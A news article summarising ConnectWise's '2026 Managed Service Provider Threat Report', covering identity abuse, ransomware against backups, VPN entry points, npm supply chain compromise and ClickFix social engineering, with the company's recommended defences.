MSPs warned as cyber criminals weaponise trusted access

New research from ConnectWise finds cyber criminals are shifting away from novel software exploits and instead targeting the trust relationships at the centre of managed service provider (MSP) networks.

The '2026 Managed Service Provider Threat Report' reviews activity observed during 2025 and identifies identity abuse, misuse of legitimate tools, weaknesses in remote access infrastructure, and software supply chain attacks as key entry routes into MSP-managed environments.

The report also says attackers are accelerating long-running tactics at greater pace and scale through increased use of artificial intelligence. While AI often does not show up clearly in incident telemetry, investigators see its impact in more convincing phishing, more realistic fraud attempts, faster malware iteration, and broader operational efficiency.

Identity abuse

The report describes a "decisive shift" in strategy, with adversaries using valid credentials and inherited trust to move quickly through environments MSPs manage for customers. This approach can scale across many tenants when remote access methods and administrative practices are repeated across client estates.

Patrick Beggs, ConnectWise's chief information security officer, described the trend as trust being turned into an attack surface.

"The defining theme of 2025 was the abuse of trust," said Beggs.

Ransomware patterns

Ransomware remained a central risk for MSPs and their customers, with activity rising to record levels late in the year. The final quarter of 2025 was the most dangerous period, with attackers favouring speed over new encryption techniques.

ConnectWise's analysis says ransomware groups refined both their initial access methods and the speed at which they could disrupt operations. The report highlights a "scan, steal, encrypt" lifecycle and notes a focus on early attacks against backup infrastructure. Disrupting backups can block recovery options and increase pressure on victims during negotiations.

The report also cites attempts to bypass one-time-password-based multi-factor authentication, including exploitation of VPN configuration artefacts and retained appliance secrets to regain access.

VPN entry points

Remote access infrastructure emerged as a recurring entry point, with public-facing SSL VPN interfaces repeatedly targeted. The report cites credential stuffing, inherited secrets and critical vulnerabilities affecting major vendors. In several cases, attackers moved from successful VPN authentication to full domain compromise within hours.

This rapid progression compresses the time defenders have to respond and increases remediation costs, as privilege escalation and lateral movement can spread across a wide estate before security teams can isolate affected systems.

Supply chain risk

The report says software supply chain compromise increased downstream risk, including campaigns that used automation and scale to compromise maintainer accounts in open source ecosystems.

It highlights "Shai-Hulud" as an example, stating that npm maintainer accounts were compromised and trojanised updates then propagated across thousands of downstream environments. The report also describes phishing and malicious package-injection campaigns targeting other repositories, including PyPI, NuGet, RubyGems and Rust.

These attacks can turn routine dependency updates into an execution path for malicious code. The report says the risk is particularly relevant for MSPs and their customers because they rely on third-party software and repeatable deployment practices across many organisations.

Social engineering

Alongside infrastructure and supply chain routes, the report describes "ClickFix" and similar user-mediated execution tactics as a repeatable intrusion method. In these scenarios, attackers persuade users to copy and paste malicious commands into legitimate utilities, shifting execution to the user and bypassing some traditional controls.

Security posture

ConnectWise argues that reactive security models "consistently failed" in MSP environments, with detection after execution often arriving too late. The report says organisations with limited identity monitoring, weak application controls or poor visibility into execution context saw the greatest impact.

It also lists areas ConnectWise says need more attention across MSP operations, including identity security, privileged access governance, behavioural detection and resilience.

Beggs said, "Attackers are exploiting valid credentials, misconfigured VPNs, trusted updates, and even user behavior to gain access to systems and data. For MSPs, this means identity security, privileged access governance, and early behavioral detection must be foundational. At ConnectWise, we're continuously evolving our platform to help customers ensure trust and transparency across the environments they manage."

ConnectWise says its platform roadmap includes work across privileged access management, managed endpoint detection and response, security information and event management, and business continuity and disaster recovery with immutable backups.

The report was produced by the ConnectWise Cyber Research Unit, which the company describes as a team that gathers intelligence from incident work, customer telemetry, ransomware leak sites and malicious infrastructure monitoring.